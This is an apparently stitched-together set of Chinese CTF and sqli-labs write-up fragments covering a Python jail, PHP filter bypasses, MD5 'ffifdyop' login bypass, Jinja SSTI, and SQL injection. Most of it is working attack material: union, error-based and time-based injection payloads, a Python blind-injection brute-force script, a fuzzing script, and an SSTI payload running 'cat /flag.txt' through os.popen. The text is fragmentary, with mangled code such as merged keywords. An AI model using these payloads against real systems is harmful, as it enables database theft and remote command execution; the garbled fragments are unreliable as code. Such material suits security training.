print("Welcome to the python jail") print("Let's have an beginner jail of calc") print("Enter your expression and I will evaluate it for you.") input_data = input("> ") filter(input_data) iflen(input_data)>13: print("Oh hacker!") exit(0) print('Answer: {}'.format(eval(input_data)))
附: MySQL专有无select可用 MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。handler 语句提供通往表的直接通道的存储引擎接口,可以用于 MyISAM 和 InnoDB 表。
也可以使用预编译转换成hex绕过
[SUCTF 2019]EasySQL
喜提fuzz脚本
1 2 3 4 5 6 7 8 9 10
import requests url = "http://7e692c90-6f0b-4aa3-babf-89bb436f6b4f.node4.buuoj.cn:81/" with open('sql-fuzz.txt') as f: for line in f: data = {"query": line} r = requests.post(url,data=data) if('Nonono' in r.text): print(line.strip(),end=" ")
http://0271ebd9-169b-4d78-8475-f6667e20789c.node4.buuoj.cn:81/check.php ?username=admin' and updatexml(1,concat(0x7e,(select substr((select password from l0ve1ysq1 where username='flag'),30,16)),0x7e),1) %23 &password=admin' and sleep(3)
[BJDCTF2020]Easy MD5
一眼丁真ffifdyop
绕过中一个奇妙的字符串
经过md5加密后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b
用途:
select * from admin where password=''or'6<乱码>'
就相当于select * from admin where password=''or 1 实现sql注入
classFlag{ //flag.php public$file; publicfunction__tostring(){ if(isset($this->file)){ echofile_get_contents($this->file); echo"<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>
echo"<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";
if($_SERVER) { if( preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']) ) die('You seem to want to do something bad?'); }
if(!preg_match('/http|https/i', $_GET['file'])) { if(preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { $file = $_GET["file"]; echo"Neeeeee! Good Job!<br>"; } } else die('fxck you! What do you want to do ?!');
if($_REQUEST) { foreach($_REQUEST as$value) { if(preg_match('/[a-zA-Z]/i', $value)) die('fxck you! I hate English!'); } }
if(file_get_contents($file) !== 'debu_debu_aqua') die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");
if( sha1($shana) === sha1($passwd) && $shana != $passwd ){ extract($_GET["flag"]); echo"Very good! you know my password. But what is flag?<br>"; } else{ die("fxck you! you don't know my password! And you don't know sha1! why you come here!"); }
if(preg_match('/^[a-z0-9]*$/isD', $code) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); } else { include"flag.php"; $code('', $arg); } ?> This is a very simple challenge andif you solve it I will give you a flag. Good Luck! Aqua is the cutest five-year-old child in the world! Isn't it ?
File "/app/app.py", line 35, in secret if(secret==None): return 'Tell me your secret.I will encrypt it so others can\'t see' rc=rc4_Modified.RC4("HereIsTreasure") #解密 deS=rc.do_crypt(secret) a=render_template_string(safe(deS)) if 'ciscn' in a.lower(): return 'flag detected!' Open an interactive python shell in this frame return
报错,能看源代码
之后便是ssti
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()")}}{% endif %}{% endfor %}
?id=-1’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 –+
数据库爆出来了,爆表名
?id=-1’ union select 1,(select group_concat(table_name) from information_schema.columns where table_schema=”security”),3 –+
表名出来了,爆字段
?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=”users”),3 –+
需要的数据都有了,咱可以直接把库给脱下来了
Less-2 - Less-4
这几题都一样,无非是注入点周围包裹的东西不一样,不多赘述,过。
Less-5 | 布尔盲注
?id=1
眉清目秀,啥都木有。
?id=1”‘ 一通测试下来,发现有了报错信息
如何利用报错信息注入呢?
?id=1’ and 1 = 1 –+ i
?id=2’ and 2 = 1 –+
那有意思的就来了,嘻嘻
1 2 3 4 5 6 7 8
mysql> select ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0); +-----------------------------------------------------------------------------------------------------+ | ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0) | +-----------------------------------------------------------------------------------------------------+ | 1 | +-----------------------------------------------------------------------------------------------------+ 1 row in set (0.00 sec)
爆数据库
1 2 3 4 5 6 7 8 9 10 11 12 13 14
import requests
url = "http://39.104.82.167/Less-5/?id=" res = ""
for i inrange(0,256): for j inrange(0,256): for k inrange(0,256): payload = f"1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{j},1)) = {k} --+" r = requests.get(url+payload) if"You are in..........."in r.text: res += chr(k) print(res) break
更改payload来爆表
1
payload = f"1' and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=\"security\"),{j},1)) = {k} --+"
更改payload 来爆字段
1
payload = f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{j},1)) = {k} --+"
?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+
判断所有表名长度
?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+
逐一判断表名
?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20,sleep(5),1)–+
判断所有字段名的长度
?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99,sleep(5),1)–+
逐一判断字段名。
?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+
判断字段内容长度
?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0);
// take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=$_POST['uname']; $passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname); fwrite($fp,'Password:'.$passwd."\n"); fclose($fp);
// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); //注意这里 $row = mysql_fetch_array($result);
// Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); }
// Quote if not a number if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return$value; }
// take the variables if(isset($_POST['uname']) && isset($_POST['passwd']))
{ //making sure uname is not injectable $uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname."\n"); fwrite($fp,'New Password:'.$passwd."\n"); fclose($fp);
// connectivity @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql); $row = mysql_fetch_array($result); //echo $row; if($row) { //echo '<font color= "#0000ff">'; $row1 = $row['username']; //echo 'Your Login name:'. $row1; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; mysql_query($update); echo"<br>"; if (mysql_error()) { echo'<font color= "#FFFF00" font size = 3 >'; print_r(mysql_error()); echo"</br></br>"; echo"</font>"; } else { echo'<font color= "#FFFF00" font size = 3 >'; //echo " You password has been successfully updated " ; echo"<br>"; echo"</font>"; } echo'<img src="../images/flag1.jpg" />'; //echo 'Your Password:' .$row['password']; echo"</font>";
} else { echo'<font size="4.5" color="#FFFF00">'; //echo "Bug off you Silly Dumb hacker"; echo"</br>"; echo'<img src="../images/slap1.jpg" />'; echo"</font>"; } }
1’ and (extractvalue(1,concat(0x5c,version(),0x5c)))# 爆版本
1’ and (extractvalue(1,concat(0x5c,database(),0x5c)))# 爆数据库
1’ and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 爆表名
1’ and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),0x5c)))# 爆字段名
1’ and (extractvalue(1,concat(0x5c,(select password from (select password from users where username=’admin1’) b) ,0x5c)))# 爆字段内容该格式针对mysql数据库。
1’ and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 爆字段内容。
// string public constant name = 'NaughtCoin'; // string public constant symbol = '0x0'; // uint public constant decimals = 18; uint public timeLock = now + 10 * 365 days; uint256 public INITIAL_SUPPLY; address public player;